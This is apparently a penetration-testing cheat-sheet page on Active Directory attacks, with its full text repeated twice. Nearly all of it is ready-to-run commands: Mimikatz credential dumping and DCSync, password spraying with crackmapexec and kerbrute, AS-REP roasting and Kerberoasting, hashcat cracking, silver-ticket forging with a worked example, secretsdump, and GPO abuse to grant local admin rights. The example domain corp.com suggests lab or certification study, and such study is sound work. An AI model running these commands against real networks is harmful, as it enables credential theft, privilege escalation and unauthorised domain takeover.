Attack

Mimikatz.exe

NOTE: Make sure to run PowerShell as Administrator

Launch Mimikatz.exe

C:\Tools\mimikatz.exe

Local Privilege Escalate

privilege::debug

Display Logged On Users NTLM Passwords

sekurlsa::logonpasswords

Display Local User NTLM Passwords

lsadump::sam

One liner

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"

Enumeration

To view account policy

net accounts

Password Attacks

Spray-Passwords.ps1 (Target Machine)

C:\Tools\Spray-Passwords.ps1 -Pass <Password> -Admin

crackmapexec (Kali)

crackmapexec smb <Target IP Address> -u <Username Lists> -p '<Password>' -d <Domain Name> --continue-on-success

NOTE: If the output of crackmapexec includes "Pwn3d!", it indicates that the user has Administrative privileges on that machine

Kerbrute_windows_amd64.exe (Target Machine)

C:\Tools\kerbrute_windows_amd64.exe passwordspray -d <Domain Name> <Username Lists> "<Password>"

AS-REP Roasting

Impacket-GetNPUsers (Kali)

Get the users and their hashed password that has "Do not require Kerberos Preauthentication enabled"

impacket-GetNPUsers -dc-ip <DC IP Address> -request -outputfile hashes.asreproast <Domain Name>/<Username>

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Get the users and their hashed password that has "Do not require Kerberos Preauthentication enabled"

C:\Tools\Rubeus.exe asreproast /nowrap

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

Impacket-GetNPUsers (Kali)

Get service hashed password

sudo impacket-GetUserSPNs -dc-ip <DC IP Address> -request -outputfile hashes.kerberoast <Domain Name>/<Username>

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Get service hashed password

C:\Tools\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Silver Tickets

NOTE: Information needed
SPN password hash
Domain SID
Target SPN

Get SPN password hash from mimikatz.exe

C:\Tools\mimikatz.exe

privilege::debug

sekurlsa::logonpasswords

*Retrieve NTLM hash

Get Domain SID from user

whoami /user

Remove the numbers after the last -

EXAMPLE:

PS C:\Windows\system32> whoami /user                                                                                                                                                                                                            USER INFORMATION                                                                                                        ----------------                                                                                                                                                                                                                                User Name SID                                                                                                           ========= =============================================                                                                 corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105                                                                 

# Domain SID = S-1-5-21-1987370270-658905905-1781884369

Get Target SPN from PowerView.ps1

Import-Module C:\Tools\PowerView.ps1

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To forge the silver ticket in mimikatz.exe

kerberos::golden /sid:<Domain SID> /domain:<Domain Name> /ptt /target:<SPN Name> /server:<SPN Server> /rc4:<SPN Password Hash> /user:<Domain User>

EXAMPLE:

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

Dcsync

Mimikatz.exe (Target Machine)

To obtain the hash

lsadump::dcsync /user:<Domain Name>\<Username>

To crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Impacket-secretsdump

impacket-secretsdump -just-dc-user <DC Username> corp.com/<Username>:'<Password>'@<DC IP Address>

NOTE: Get the NTLM hash from DRSUAPI method located before the ending trail of :

To crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Exploits

SharpGPOAbuse.exe

Get the list of Group Policy Objects (GPO)

Get-GPO -All | Select DisplayName

Add user into local administrators group

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO Name>"

Force Group Policy to update

gpupdate /force

PreviousEnumeration NextLateral Movement

Last updated 3 days ago

Attack

Mimikatz.exe

NOTE: Make sure to run PowerShell as Administrator

Launch Mimikatz.exe

C:\Tools\mimikatz.exe

Local Privilege Escalate

privilege::debug

Display Logged On Users NTLM Passwords

sekurlsa::logonpasswords

Display Local User NTLM Passwords

lsadump::sam

One liner

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"

Enumeration

To view account policy

net accounts

Password Attacks

Spray-Passwords.ps1 (Target Machine)

C:\Tools\Spray-Passwords.ps1 -Pass <Password> -Admin

crackmapexec (Kali)

crackmapexec smb <Target IP Address> -u <Username Lists> -p '<Password>' -d <Domain Name> --continue-on-success

NOTE: If the output of crackmapexec includes "Pwn3d!", it indicates that the user has Administrative privileges on that machine

Kerbrute_windows_amd64.exe (Target Machine)

C:\Tools\kerbrute_windows_amd64.exe passwordspray -d <Domain Name> <Username Lists> "<Password>"

AS-REP Roasting

Impacket-GetNPUsers (Kali)

Get the users and their hashed password that has "Do not require Kerberos Preauthentication enabled"

impacket-GetNPUsers -dc-ip <DC IP Address> -request -outputfile hashes.asreproast <Domain Name>/<Username>

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Get the users and their hashed password that has "Do not require Kerberos Preauthentication enabled"

C:\Tools\Rubeus.exe asreproast /nowrap

Crack the hashed password

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Kerberoasting

Impacket-GetNPUsers (Kali)

Get service hashed password

sudo impacket-GetUserSPNs -dc-ip <DC IP Address> -request -outputfile hashes.kerberoast <Domain Name>/<Username>

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Rubeus (Target Machine)

Get service hashed password

C:\Tools\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Crack the hashed password

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Silver Tickets

NOTE: Information needed
SPN password hash
Domain SID
Target SPN

Get SPN password hash from mimikatz.exe

C:\Tools\mimikatz.exe

privilege::debug

sekurlsa::logonpasswords

*Retrieve NTLM hash

Get Domain SID from user

whoami /user

Remove the numbers after the last -

EXAMPLE:

PS C:\Windows\system32> whoami /user                                                                                                                                                                                                            USER INFORMATION                                                                                                        ----------------                                                                                                                                                                                                                                User Name SID                                                                                                           ========= =============================================                                                                 corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105                                                                 

# Domain SID = S-1-5-21-1987370270-658905905-1781884369

Get Target SPN from PowerView.ps1

Import-Module C:\Tools\PowerView.ps1

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To forge the silver ticket in mimikatz.exe

kerberos::golden /sid:<Domain SID> /domain:<Domain Name> /ptt /target:<SPN Name> /server:<SPN Server> /rc4:<SPN Password Hash> /user:<Domain User>

EXAMPLE:

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

Dcsync

Mimikatz.exe (Target Machine)

To obtain the hash

lsadump::dcsync /user:<Domain Name>\<Username>

To crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Impacket-secretsdump

impacket-secretsdump -just-dc-user <DC Username> corp.com/<Username>:'<Password>'@<DC IP Address>

NOTE: Get the NTLM hash from DRSUAPI method located before the ending trail of :

To crack it

hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Exploits

SharpGPOAbuse.exe

Get the list of Group Policy Objects (GPO)

Get-GPO -All | Select DisplayName

Add user into local administrators group

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO Name>"

Force Group Policy to update

gpupdate /force

PreviousEnumeration NextLateral Movement

Last updated 3 days ago